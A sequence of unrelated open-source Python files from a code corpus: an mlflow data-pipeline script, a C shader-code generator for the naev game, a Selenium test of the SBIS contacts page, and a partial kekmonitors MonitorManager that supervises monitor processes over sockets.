    with tempfile.TemporaryDirectory() as tmp_dir:
        if "data_upload_S3" in active_steps:
            # Upload files to S3 bucket
            _ = mlflow.run(
                os.path.join(
                    hydra.utils.get_original_cwd(),
                    "src",
                    "components",
                    "data_upload_S3"),
                "main",
                parameters={
                    "AWS_DEFAULT_REGION": config["main"]["AWS"]["DEFAULT_REGION_NAME"],
                    "bucket_name": config["data_upload_S3"]["bucket_name"],
                    "bucket_prefix": config["data_upload_S3"]["bucket_prefix"],
                    "dataset_path": config["data_upload_S3"]["path"],
                })
        if "data_upload" in active_steps:
            # Upload file and load in W&B
            _ = mlflow.run(
                os.path.join(
                    hydra.utils.get_original_cwd(),
                    "src",
                    "components",
                    "data_upload_WandB2"),
                "main",
                parameters={
                    "data_location": config["data_upload_S3"]["data_location"],
                    "bucket_path": "s3://" +
                    config['data_upload_S3']['bucket_name'] +
                    "/" +
                    config["data_upload_S3"]["bucket_prefix"],
                    "directory_path": config["data_upload_S3"]["directory_path"],
                    "output_artifact": "raw_data",
                    "output_type": "data_upload",
                    "output_description": "Artifact for storage of data on Weights & Biases",
                },
            )
        if "data_processing" in active_steps:
            # Process data by extracting crucial files from data uploaded
            _ = mlflow.run(
                os.path.join(
                    hydra.utils.get_original_cwd(),
                    "src",
                    "components",
                    "data_processing"),
                "main",
                parameters={
                    "AWS_DEFAULT_REGION": config["main"]["AWS"]["DEFAULT_REGION_NAME"],
                    "data_upload_type": config["data_upload_S3"]["data_upload_type"],
                    "bucket_name": config["data_upload_S3"]["bucket_name"],
                    "input_artifact": "raw_data:latest",
                    "output_directory": config["data_processing"]["output_directory"],
                    "output_artifact": "processed_data",
                    "output_type": "processed_data",
                    "output_description": "Processing the data by" +
                    "separating json file to different files &" +
                    " uploading processed data to S3",
                })
        if "database_upload" in active_steps:
            # Uploading Processed data to database.
            # (A redundant second os.path.join() wrapper was removed here:
            # os.path.join(os.path.join(x, ...)) is equivalent to one call.)
            _ = mlflow.run(
                os.path.join(
                    hydra.utils.get_original_cwd(),
                    "src",
                    "components",
                    "database_upload"),
                "main",
                parameters={
                    "data_download_type": config["data_processing"]["data_upload_type"],
                    "MONGO_Cluster_name": config["main"]["MONGODB"]["MONGO_Cluster_name"],
                    "Database_name": config["database_upload"]["Database_name"],
                    "input_artifact": "processed_data:latest",
                    "output_artifact": "database_upload",
                    "output_type": "database_upload",
                    "output_description": "Uploading the processed data " +
                    "to a MONGO DB database for query purposes"})
if __name__ == "__main__":
    # Hydra injects the config object when the script is executed directly.
    run_pipeline()
| arkaan27/data-engineering-pipeline | main.py | main.py | py | 4,939 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "omegaconf.DictConfig",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "tempfile.Te... |
30196444534 | #!/usr/bin/env python3
import collections
# Declarative description of one GLSL program: its name, the vertex/fragment
# source files, the vertex attributes and uniforms to look up, and (optional)
# fragment-shader subroutine uniforms mapped to their selectable routines.
Shader = collections.namedtuple("Shader", "name vs_path fs_path attributes uniforms subroutines")
# Every shader program the generated C code will declare, load and unload.
SHADERS = [
    Shader(
        name = "circle",
        vs_path = "circle.vert",
        fs_path = "circle.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color", "radius"],
        subroutines = {},
    ),
    Shader(
        name = "circle_filled",
        vs_path = "circle.vert",
        fs_path = "circle_filled.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color", "radius"],
        subroutines = {},
    ),
    Shader(
        name = "circle_partial",
        vs_path = "circle.vert",
        fs_path = "circle_partial.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color", "radius", "angle1", "angle2"],
        subroutines = {},
    ),
    Shader(
        name = "solid",
        vs_path = "project.vert",
        fs_path = "solid.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color"],
        subroutines = {},
    ),
    Shader(
        name = "trail",
        vs_path = "project_pos.vert",
        fs_path = "trail.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "c1", "c2", "t1", "t2", "dt", "pos1", "pos2", "r", "nebu_col" ],
        subroutines = {
            "trail_func" : [
                "trail_default",
                "trail_pulse",
                "trail_wave",
                "trail_flame",
                "trail_nebula",
                "trail_arc",
                "trail_bubbles",
            ]
        }
    ),
    Shader(
        name = "smooth",
        vs_path = "smooth.vert",
        fs_path = "smooth.frag",
        attributes = ["vertex", "vertex_color"],
        uniforms = ["projection"],
        subroutines = {},
    ),
    Shader(
        name = "texture",
        vs_path = "texture.vert",
        fs_path = "texture.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color", "tex_mat"],
        subroutines = {},
    ),
    Shader(
        name = "texture_interpolate",
        vs_path = "texture.vert",
        fs_path = "texture_interpolate.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color", "tex_mat", "sampler1", "sampler2", "inter"],
        subroutines = {},
    ),
    Shader(
        name = "nebula",
        vs_path = "nebula.vert",
        fs_path = "nebula_overlay.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "hue", "brightness", "horizon", "eddy_scale", "time"],
        subroutines = {},
    ),
    Shader(
        name = "nebula_background",
        vs_path = "nebula.vert",
        fs_path = "nebula_background.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "hue", "brightness", "eddy_scale", "time"],
        subroutines = {},
    ),
    Shader(
        name = "nebula_map",
        vs_path = "nebula_map.vert",
        fs_path = "nebula_map.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "hue", "eddy_scale", "time", "globalpos", "alpha"],
        subroutines = {},
    ),
    Shader(
        name = "stars",
        vs_path = "stars.vert",
        fs_path = "stars.frag",
        attributes = ["vertex", "brightness"],
        uniforms = ["projection", "star_xy", "wh", "xy", "scale"],
        subroutines = {},
    ),
    Shader(
        name = "font",
        vs_path = "font.vert",
        fs_path = "font.frag",
        attributes = ["vertex", "tex_coord"],
        uniforms = ["projection", "color", "outline_color"],
        subroutines = {},
    ),
    Shader(
        name = "safelanes",
        vs_path = "project_pos.vert",
        fs_path = "safelanes.frag",
        attributes = ["vertex"],
        #uniforms = ["projection", "color", "dt", "r", "dimensions" ],
        uniforms = ["projection", "color", "dimensions" ],
        subroutines = {},
    ),
    Shader(
        name = "beam",
        vs_path = "project_pos.vert",
        fs_path = "beam.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "color", "dt", "r", "dimensions" ],
        subroutines = {
            "beam_func" : [
                "beam_default",
                "beam_wave",
                "beam_arc",
                "beam_helix",
                "beam_organic",
                "beam_unstable",
                "beam_fuzzy",
            ]
        }
    ),
    Shader(
        name = "tk",
        vs_path = "tk.vert",
        fs_path = "tk.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "c", "dc", "lc", "oc", "wh", "corner_radius"],
        subroutines = {},
    ),
    Shader(
        name = "jump",
        vs_path = "project_pos.vert",
        fs_path = "jump.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "progress", "direction", "dimensions"],
        subroutines = {
            "jump_func" : [
                "jump_default",
                "jump_nebula",
                "jump_organic",
                "jump_circular",
                "jump_wind",
            ]
        }
    ),
    Shader(
        name = "colorblind",
        vs_path = "postprocess.vert",
        fs_path = "colorblind.frag",
        attributes = ["VertexPosition"],
        uniforms = ["ClipSpaceFromLocal", "MainTex"],
        subroutines = {},
    ),
    Shader(
        name = "shake",
        vs_path = "postprocess.vert",
        fs_path = "shake.frag",
        attributes = ["VertexPosition"],
        uniforms = ["ClipSpaceFromLocal", "MainTex", "shake_pos", "shake_vel", "shake_force"],
        subroutines = {},
    ),
    Shader(
        name = "damage",
        vs_path = "postprocess.vert",
        fs_path = "damage.frag",
        attributes = ["VertexPosition"],
        uniforms = ["ClipSpaceFromLocal", "MainTex", "damage_strength", "love_ScreenSize"],
        subroutines = {},
    ),
    Shader(
        name = "gamma_correction",
        vs_path = "postprocess.vert",
        fs_path = "gamma_correction.frag",
        attributes = ["VertexPosition"],
        uniforms = ["ClipSpaceFromLocal", "MainTex", "gamma"],
        subroutines = {},
    ),
    Shader(
        name = "status",
        vs_path = "project_pos.vert",
        fs_path = "status.frag",
        attributes = ["vertex"],
        uniforms = ["projection", "ok"],
        subroutines = {},
    ),
]
def write_header(f):
    """Write the generated-file banner comment to *f*."""
    f.write(f"/* FILE GENERATED BY {__file__} */\n\n")
def generate_h_file(f):
    """Write the contents of shaders.gen.h (Shaders struct + prototypes) to *f*."""
    write_header(f)
    f.write("#ifndef SHADER_GEN_C_H\n")
    f.write("#define SHADER_GEN_C_H\n")
    f.write("#include \"opengl.h\"\n\n")
    f.write("typedef struct Shaders_ {\n")
    for shader in SHADERS:
        f.write("   struct {\n")
        f.write("      GLuint program;\n")
        # Attribute and uniform locations are all plain GLuint handles.
        for handle in shader.attributes + shader.uniforms:
            f.write(f"      GLuint {handle};\n")
        for subroutine, routines in shader.subroutines.items():
            f.write("      struct {\n")
            f.write("         GLuint uniform;\n")
            for routine in routines:
                f.write(f"         GLuint {routine};\n")
            f.write(f"      }} {subroutine};\n")
        f.write(f"   }} {shader.name};\n")
    f.write("} Shaders;\n\n")
    f.write("extern Shaders shaders;\n\n")
    f.write("void shaders_load (void);\n")
    f.write("void shaders_unload (void);\n")
    f.write("#endif\n")
def generate_c_file(f):
    """Write the contents of shaders.gen.c (loader/unloader bodies) to *f*."""
    write_header(f)
    f.write("#include <string.h>\n")
    f.write("#include \"shaders.gen.h\"\n")
    f.write("#include \"opengl_shader.h\"\n\n")
    f.write("Shaders shaders;\n\n")
    f.write("void shaders_load (void) {\n")
    for i, shader in enumerate(SHADERS):
        name = shader.name
        f.write(f'   shaders.{name}.program = gl_program_vert_frag("{shader.vs_path}", "{shader.fs_path}");\n')
        for attribute in shader.attributes:
            f.write(f'   shaders.{name}.{attribute} = glGetAttribLocation(shaders.{name}.program, "{attribute}");\n')
        for uniform in shader.uniforms:
            f.write(f'   shaders.{name}.{uniform} = glGetUniformLocation(shaders.{name}.program, "{uniform}");\n')
        # Subroutine indices are only queried when the GL context supports them.
        f.write("   if (gl_has( OPENGL_SUBROUTINES )) {\n")
        for subroutine, routines in shader.subroutines.items():
            f.write(f'      shaders.{name}.{subroutine}.uniform = glGetSubroutineUniformLocation( shaders.{name}.program, GL_FRAGMENT_SHADER, "{subroutine}" );\n')
            for routine in routines:
                f.write(f'      shaders.{name}.{subroutine}.{routine} = glGetSubroutineIndex( shaders.{name}.program, GL_FRAGMENT_SHADER, "{routine}" );\n')
        f.write("   }\n")
        # Blank line between shaders, but not after the last one.
        if i != len(SHADERS) - 1:
            f.write("\n")
    f.write("}\n\n")
    f.write("void shaders_unload (void) {\n")
    for shader in SHADERS:
        f.write(f"   glDeleteProgram(shaders.{shader.name}.program);\n")
    f.write("   memset(&shaders, 0, sizeof(shaders));\n")
    f.write("}\n")
# Generate both output files in the current working directory on import/run.
with open("shaders.gen.h", "w") as shaders_gen_h:
    generate_h_file(shaders_gen_h)
with open("shaders.gen.c", "w") as shaders_gen_c:
    generate_c_file(shaders_gen_c)
| Poussinou/naev | src/shaders_c_gen.py | shaders_c_gen.py | py | 9,168 | python | en | code | null | github-code | 1 | [
{
"api_name": "collections.namedtuple",
"line_number": 5,
"usage_type": "call"
}
] |
72163556515 | from SbisSite import SearchHelper
from selenium.webdriver.common.by import By
import time
def test_sbis(browser):
    """End-to-end check of the SBIS contacts page region switcher."""
    sbis_main_page = SearchHelper(browser)
    # Open the site
    sbis_main_page.go_to_site()
    # Check that cities from my home region appear in the contact list
    cities_kostroma = ['Кострома', 'Нея']
    for c in cities_kostroma:
        assert c in [x.text for x in sbis_main_page.get_city_names()]
    # Open the list of all regions and pick the target one
    new_region = 'Камчатский край'
    cities_kamchatka = ['Петропавловск-Камчатский']
    sbis_main_page.open_region_chooser()
    region_panel = sbis_main_page.get_region_chooser_panel()
    region_panel.find_element(By.XPATH, "//li/span[contains(@title,'{}')]".format(new_region)).click()
    # NOTE(review): fixed sleep to let the page refresh after the click —
    # consider an explicit wait on the URL/title; confirm 2s suffices on CI.
    time.sleep(2)
    # Verify that the url, title and city list reflect the chosen region
    assert '41-kamchatskij-kraj' in sbis_main_page.get_current_url()
    for c in cities_kamchatka:
        assert c in [x.text for x in sbis_main_page.get_city_names()]
    assert new_region in sbis_main_page.get_page_title()
| deadenddanse/tenzor | Task2.py | Task2.py | py | 1,289 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "SbisSite.SearchHelper",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.common.by.By.XPATH",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "selenium.webdriver.common.by.By",
"line_number": 19,
"usage_type": "name"... |
9356428118 | import asyncio
import copy
import json
import os
import shlex
import subprocess
import sys
from datetime import datetime
from json.decoder import JSONDecodeError
from typing import Any, Dict, List, cast
import pymongo
import tornado.httpclient
from watchdog import observers
from watchdog.events import FileSystemEvent, FileSystemEventHandler
import kekmonitors.utils.tools
from kekmonitors.comms.msg import Cmd, Response, badResponse, okResponse
from kekmonitors.comms.server import Server
from kekmonitors.config import COMMANDS, ERRORS, Config, LogConfig
from kekmonitors.discord_embeds import get_mm_crash_embed
# uvloop requires python >= 3.7; skip the import on older interpreters.
# NOTE(review): only the minor version is checked — assumes major version 3.
if sys.version_info[1] > 6:
    import uvloop
def get_parent_directory(src: str) -> str:
    """
    Return the parent directory of `src`.

    Uses os.path.dirname instead of the previous
    `src[: src.rfind(os.path.sep)]` slice: when `src` contained no separator,
    rfind() returned -1 and the slice silently chopped the last character.
    """
    return os.path.dirname(src)
class MonitorManager(Server, FileSystemEventHandler):
"""This can be used to manage monitors/scrapers with an external api."""
def __init__(self, config: Config = None):
if not config:
config = Config()
# set default name if not already set in config
if not config["OtherConfig"]["socket_name"]:
config["OtherConfig"]["socket_name"] = f"Executable.MonitorManager"
self.config = config
# create logger
logconfig = LogConfig(config)
logconfig["OtherConfig"]["socket_name"] += ".General"
self.general_logger = kekmonitors.utils.tools.get_logger(logconfig)
if sys.version_info[1] > 6:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
else:
self.general_logger.warning(
f"You're currently running python {sys.version_info[0]}.{sys.version_info[1]}, which does not support uvloop. Please consider upgrading to at least 3.7, since uvloop brings many enhancements to the asyncio loop."
)
super().__init__(
config, f"{self.config['GlobalConfig']['socket_path']}/MonitorManager"
) # Server init
super(Server).__init__() # FileSystemEventHandler init
# initialize callbacks
self.cmd_to_callback[COMMANDS.MM_STOP_MONITOR_MANAGER] = self._stop_serving
self.cmd_to_callback[COMMANDS.MM_ADD_MONITOR] = self.on_add_monitor
self.cmd_to_callback[COMMANDS.MM_ADD_SCRAPER] = self.on_add_scraper
self.cmd_to_callback[
COMMANDS.MM_ADD_MONITOR_SCRAPER
] = self.on_add_monitor_scraper
self.cmd_to_callback[COMMANDS.MM_STOP_MONITOR] = self.on_stop_monitor
self.cmd_to_callback[COMMANDS.MM_STOP_SCRAPER] = self.on_stop_scraper
self.cmd_to_callback[
COMMANDS.MM_STOP_MONITOR_SCRAPER
] = self.on_stop_monitor_scraper
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_STATUS
] = self.on_get_monitor_status
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_STATUS
] = self.on_get_scraper_status
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_SCRAPER_STATUS
] = self.on_get_status
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_CONFIG
] = self.on_get_monitor_config
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_CONFIG
] = self.on_set_monitor_config
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_WHITELIST
] = self.on_get_monitor_whitelist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_WHITELIST
] = self.on_set_monitor_whitelist
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_BLACKLIST
] = self.on_get_monitor_blacklist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_BLACKLIST
] = self.on_set_monitor_blacklist
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_WEBHOOKS
] = self.on_get_monitor_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_WEBHOOKS
] = self.on_set_monitor_webhooks
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_CONFIG
] = self.on_get_scraper_config
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_CONFIG
] = self.on_set_scraper_config
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_WHITELIST
] = self.on_get_scraper_whitelist
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_WHITELIST
] = self.on_set_scraper_whitelist
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_BLACKLIST
] = self.on_get_scraper_blacklist
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_BLACKLIST
] = self.on_set_scraper_blacklist
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_WEBHOOKS
] = self.on_get_scraper_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_WEBHOOKS
] = self.on_set_scraper_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_BLACKLIST
] = self.on_set_monitor_scraper_blacklist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_WHITELIST
] = self.on_set_monitor_scraper_whitelist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_WEBHOOKS
] = self.on_set_monitor_scraper_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_CONFIG
] = self.on_set_monitor_scraper_configs
self.cmd_to_callback[COMMANDS.MM_GET_SCRAPER_SHOES] = self.on_get_scraper_shoes
self.cmd_to_callback[COMMANDS.MM_GET_MONITOR_SHOES] = self.on_get_monitor_shoes
# initialize variables
self.monitor_processes = {} # type: Dict[str, Dict[str, Any]]
self.scraper_processes = {} # type: Dict[str, Dict[str, Any]]
self.monitor_sockets = {} # type: Dict[str, str]
self.scraper_sockets = {} # type: Dict[str, str]
self.register_db = pymongo.MongoClient(
self.config["GlobalConfig"]["db_path"]
)[ # database where to find class_name -> filename relation
self.config["GlobalConfig"]["db_name"]
][
"register"
]
# let's avoid concurrency problems on socket creation/deletion
self.socket_lock = asyncio.Lock()
# and don't stop on MM_STOP_MONITOR_MANAGER if we are in the loop
self._loop_lock = asyncio.Lock()
# mandatory arguments, needed in the command
self.add_args = ["name"]
self.stop_args = ["name"]
self.getter_args = ["name"]
self.setter_args = ["name", "payload"]
self.shutdown_all_on_exit = True # you might wanna change this
# needed for the crash webhook
tornado.httpclient.AsyncHTTPClient.configure(
"tornado.curl_httpclient.CurlAsyncHTTPClient"
)
self.client = tornado.httpclient.AsyncHTTPClient()
# create main loop task
self.check_status_task = self._asyncio_loop.create_task(self.check_status())
# watches the config folder for any change. calls on_modified when any monitored file is modified
self.watcher = observers.Observer()
self.watcher.schedule(self, self.config["GlobalConfig"]["config_path"], True)
self.watcher.schedule(self, self.config["GlobalConfig"]["socket_path"], True)
# needed for proper shutdown
self.has_to_quit = False
    def start(self):
        """Start the Monitor Manager."""
        # Begin watching the config/socket directories, then hand control to
        # the asyncio loop (blocks until the loop is stopped).
        self.watcher.start()
        self._asyncio_loop.run_forever()
def on_modified(self, event: FileSystemEvent):
# called when any of the monitored files is modified.
# we are only interested int the configs for now.
filepath = event.key[1] # type: str
if not filepath.endswith(".json"):
return
# if a config file is updated:
if filepath.startswith(self.config["GlobalConfig"]["config_path"]):
if filepath.startswith(
os.path.sep.join((self.config["GlobalConfig"]["config_path"], "common"))
):
asyncio.run_coroutine_threadsafe(
self.update_common_config(filepath), self._asyncio_loop
)
else:
asyncio.run_coroutine_threadsafe(
self.update_specific_config(filepath), self._asyncio_loop
)
def on_created(self, event: FileSystemEvent):
filename = event.key[1] # type: str
# if a socket was created:
if filename.find(self.config["GlobalConfig"]["socket_path"]) != -1:
asyncio.run_coroutine_threadsafe(self.on_add_sockets(), self._asyncio_loop)
def on_deleted(self, event):
filename = event.key[1] # type: str
# if a socket was deleted:
if filename.find(self.config["GlobalConfig"]["socket_path"]) != -1:
asyncio.run_coroutine_threadsafe(
self.on_delete_sockets(), self._asyncio_loop
)
async def on_add_sockets(self):
"""
Routine that updates the internal list of available sockets on add event
"""
async with self.socket_lock:
# get any socket that is not in the list
new_monitor_sockets = {} # type: Dict[str, str]
new_scraper_sockets = {} # type: Dict[str, str]
for filename in os.listdir(self.config["GlobalConfig"]["socket_path"]):
splits = filename.split(".")
if splits[0] == "Monitor" and splits[1] not in self.monitor_sockets:
new_monitor_sockets[splits[1]] = os.path.sep.join(
[self.config["GlobalConfig"]["socket_path"], filename]
)
elif splits[0] == "Scraper" and splits[1] not in self.scraper_sockets:
new_scraper_sockets[splits[1]] = os.path.sep.join(
[self.config["GlobalConfig"]["socket_path"], filename]
)
# check if it's alive
alive_monitor_sockets, alive_scraper_sockets = await asyncio.gather(
self.get_alive_sockets(new_monitor_sockets.values()),
self.get_alive_sockets(new_scraper_sockets.values()),
)
# if it is, add it to the list
for class_name in new_monitor_sockets:
if new_monitor_sockets[class_name] in alive_monitor_sockets:
self.monitor_sockets[class_name] = new_monitor_sockets[class_name]
for class_name in new_scraper_sockets:
if new_scraper_sockets[class_name] in alive_scraper_sockets:
self.scraper_sockets[class_name] = new_scraper_sockets[class_name]
async def on_delete_sockets(self):
"""
Routine that updates the internal list of available sockets on delete event
"""
async with self.socket_lock:
existing_monitor_sockets = []
existing_scraper_sockets = []
# get the current list of existing sockets
for f in list(os.listdir(self.config["GlobalConfig"]["socket_path"])):
if f.startswith("Monitor."):
existing_monitor_sockets.append(f)
elif f.startswith("Scraper."):
existing_scraper_sockets.append(f)
# temp copy
updated_monitor_sockets = copy.copy(self.monitor_sockets)
updated_scraper_sockets = copy.copy(self.scraper_sockets)
# remove every internal socket that is not existing
for class_name in self.monitor_sockets:
if "Monitor." + class_name not in existing_monitor_sockets:
updated_monitor_sockets.pop(class_name)
for class_name in self.scraper_sockets:
if "Scraper." + class_name not in existing_scraper_sockets:
updated_scraper_sockets.pop(class_name)
self.monitor_sockets = updated_monitor_sockets
self.scraper_sockets = updated_scraper_sockets
async def get_alive_sockets(self, sockets: List[str]) -> List[str]:
"""
Ping the provided sockets and return a list of alive sockets
"""
tasks = []
for socket in sockets:
cmd = Cmd()
cmd.cmd = COMMANDS.PING
tasks.append(self.make_request(socket, cmd))
responses = await asyncio.gather(*tasks) # type: List[Response]
alive = []
for response, socket in zip(responses, sockets):
if not response.error.value:
alive.append(socket)
return alive
async def update_common_config(self, filename: str):
    """Read a changed common config file and push it to interested monitors/scrapers.

    Each monitor/scraper only receives the JSON section keyed by its own
    class name; sockets with no matching entry are skipped.
    """
    self.general_logger.debug(f"File {filename} has changed!")
    try:
        with open(filename, "r") as f:
            j = json.load(f)
    except JSONDecodeError:
        self.general_logger.warning(
            f"File {filename} has changed but contains invalid json data"
        )
        return
    # Map the changed file to its broadcast command once; it does not
    # depend on which socket family we are iterating below.
    basename = filename.split(os.path.sep)[-1]
    commands_by_file = {
        "whitelists.json": COMMANDS.SET_COMMON_WHITELIST,
        "configs.json": COMMANDS.SET_COMMON_CONFIG,
        "blacklists.json": COMMANDS.SET_COMMON_BLACKLIST,
        "webhooks.json": COMMANDS.SET_COMMON_WEBHOOKS,
    }
    if basename not in commands_by_file:
        # Not a file we care about.
        return
    cmd = commands_by_file[basename]
    for sockets in (self.monitor_sockets, self.scraper_sockets):
        tasks = []
        for name in sockets:
            if name in j:
                c = Cmd()
                c.cmd = cmd
                # Send only the corresponding part to the monitor/scraper.
                c.payload = j[name]
                tasks.append(self.make_request(sockets[name], c))
        # Send all requests for this socket family concurrently.
        responses = await asyncio.gather(*tasks)  # List[Response]
        for response in responses:
            if response.error.value:
                self.general_logger.warning(
                    f"Failed to update config: {response.error}"
                )
async def update_specific_config(self, filename: str):
    """Read a changed monitor/scraper-specific config file and push it out.

    The parent folder ("monitors" or "scrapers") selects which socket
    family is interested; each instance receives only its own JSON section.
    """
    self.general_logger.debug(f"File {filename} has changed!")
    try:
        with open(filename, "r") as f:
            j = json.load(f)
    except JSONDecodeError:
        self.general_logger.warning(
            f"File {filename} has changed but contains invalid json data"
        )
        return
    splits = filename.split(os.path.sep)
    # The containing folder decides the target socket family.
    if "monitors" in splits:
        sockets = self.monitor_sockets
    elif "scrapers" in splits:
        sockets = self.scraper_sockets
    else:
        self.general_logger.debug("File not useful.")
        return
    # We are interested in configs, whitelists, blacklists, webhooks.
    commands_by_file = {
        "whitelists.json": COMMANDS.SET_SPECIFIC_WHITELIST,
        "configs.json": COMMANDS.SET_SPECIFIC_CONFIG,
        "blacklists.json": COMMANDS.SET_SPECIFIC_BLACKLIST,
        "webhooks.json": COMMANDS.SET_SPECIFIC_WEBHOOKS,
    }
    if splits[-1] not in commands_by_file:
        return
    cmd = commands_by_file[splits[-1]]
    tasks = []
    for name in sockets:
        if name in j:
            c = Cmd()
            c.cmd = cmd
            # Send only the corresponding part to the instance.
            c.payload = j[name]
            tasks.append(self.make_request(sockets[name], c))
    # Send the requests concurrently.
    responses = await asyncio.gather(*tasks)  # List[Response]
    for response in responses:
        if response.error.value:
            self.general_logger.warning(
                f"Failed to update config: {response.error}"
            )
async def on_server_stop(self):
    """
    Routine that runs on server stop. Shuts down the monitor manager
    """
    async with self._loop_lock:
        # stop the config watcher
        self.watcher.stop()
        self.watcher.join()
        if self.shutdown_all_on_exit:
            # get all the existing sockets
            sockets = []  # type: List[str]
            tasks = []
            # Queue a STOP request for every Monitor./Scraper. socket file
            # currently present in the socket directory.
            for sockname in os.listdir(self.config["GlobalConfig"]["socket_path"]):
                if sockname.startswith("Scraper.") or sockname.startswith(
                    "Monitor."
                ):
                    cmd = Cmd()
                    cmd.cmd = COMMANDS.STOP
                    sockets.append(sockname)
                    self.general_logger.info(f"Stopping {sockname}...")
                    tasks.append(
                        self.make_request(
                            f"{self.config['GlobalConfig']['socket_path']}{os.path.sep}{sockname}",
                            cmd,
                        )
                    )
            # send request to stop (all concurrently)
            responses = await asyncio.gather(*tasks)  # type: List[Response]
            for sockname, r in zip(sockets, responses):
                # if an error happened...
                if r.error.value:
                    # if the socket was not used remove it
                    if r.error == ERRORS.SOCKET_COULDNT_CONNECT:
                        # Stale socket file: nothing is listening behind it,
                        # so clean up the leftover file.
                        os.remove(
                            os.path.sep.join(
                                [
                                    self.config["GlobalConfig"]["socket_path"],
                                    sockname,
                                ]
                            )
                        )
                        self.general_logger.info(
                            f"{self.config['GlobalConfig']['socket_path']}{os.path.sep}{sockname} was removed because unavailable"
                        )
                    # else something else happened, dont do anything
                    else:
                        self.general_logger.warning(
                            f"Error occurred while attempting to stop {sockname}: {r.error}"
                        )
                # ok
                else:
                    self.general_logger.info(f"{sockname} was successfully stopped")
        # Finally halt the manager's own event loop and acknowledge.
        self._asyncio_loop.stop()
        self.general_logger.info("Shutting down...")
        return okResponse()
async def check_status(self):
    """Main MonitorManager loop. Every second it checks its monitored
    processes and looks if they are still alive, possibly reporting any
    exit code."""
    while True:
        async with self._loop_lock:
            self.monitor_processes = await self._reap_processes(
                "Monitor", self.monitor_processes
            )
            self.scraper_processes = await self._reap_processes(
                "Scraper", self.scraper_processes
            )
        await asyncio.sleep(1)

async def _reap_processes(self, kind: str, processes):
    """Return the entries of *processes* that are still running.

    Exited processes are logged; a non-zero exit code is additionally
    reported to the crash webhook (when one is configured). *kind* is
    "Monitor" or "Scraper" and only affects log/embed text.
    """
    alive = {}
    for class_name, entry in processes.items():
        proc = entry["process"]
        if proc.poll() is None:
            # Still running: keep it.
            alive[class_name] = entry
            continue
        log = f"{kind} {class_name} has stopped with code: {proc.returncode}"
        if proc.returncode:
            self.general_logger.warning(log)
            if self.config["WebhookConfig"]["crash_webhook"]:
                await self._report_crash(kind, class_name, proc)
        else:
            # Clean exit: informational only.
            self.general_logger.info(log)
    return alive

async def _report_crash(self, kind: str, class_name: str, proc):
    """POST a crash embed for the exited process *proc* to the crash webhook."""
    webhook_config = self.config["WebhookConfig"]
    embed = get_mm_crash_embed(
        f"{kind} {class_name}",
        proc.returncode,
        proc.pid,
    )
    ts = datetime.now().strftime(webhook_config["timestamp_format"])
    embed.set_footer(
        text=f"{webhook_config['provider']} | {ts}",
        icon_url=webhook_config["provider_icon"],
    )
    data = json.dumps(
        {
            "embeds": [embed.to_dict()],
            "username": "MonitorManager process watcher",
            "avatar_url": webhook_config["provider_icon"],
        }
    )
    # Best effort: failures to deliver the webhook are ignored.
    await self.client.fetch(
        webhook_config["crash_webhook"],
        method="POST",
        body=data,
        headers={"content-type": "application/json"},
        raise_error=False,
    )
async def on_add_monitor(self, cmd: Cmd) -> Response:
    """Handle an ADD_MONITOR command: look the monitor up in the register db
    and try to spawn it."""
    valid, missing = cmd.has_valid_args(self.add_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"Missing arguments: {missing}"
        return response
    payload = cast(Dict[str, Any], cmd.payload)
    db_monitor = self.register_db["monitors"].find_one(
        {"name": payload["name"]}
    )
    if not db_monitor:
        response = badResponse()
        response.error = ERRORS.MONITOR_NOT_REGISTERED
        response.info = f"Tried to add monitor {payload['name']} but it was not found in the db. Did you start it at least once manually?"
        return response
    started, reason = await self.add_monitor(db_monitor["path"], payload)
    if started:
        return okResponse()
    response = badResponse()
    response.error = ERRORS.MM_COULDNT_ADD_MONITOR
    response.info = reason
    return response
async def on_add_scraper(self, cmd: Cmd) -> Response:
    """Handle an ADD_SCRAPER command: look the scraper up in the register db
    and try to spawn it."""
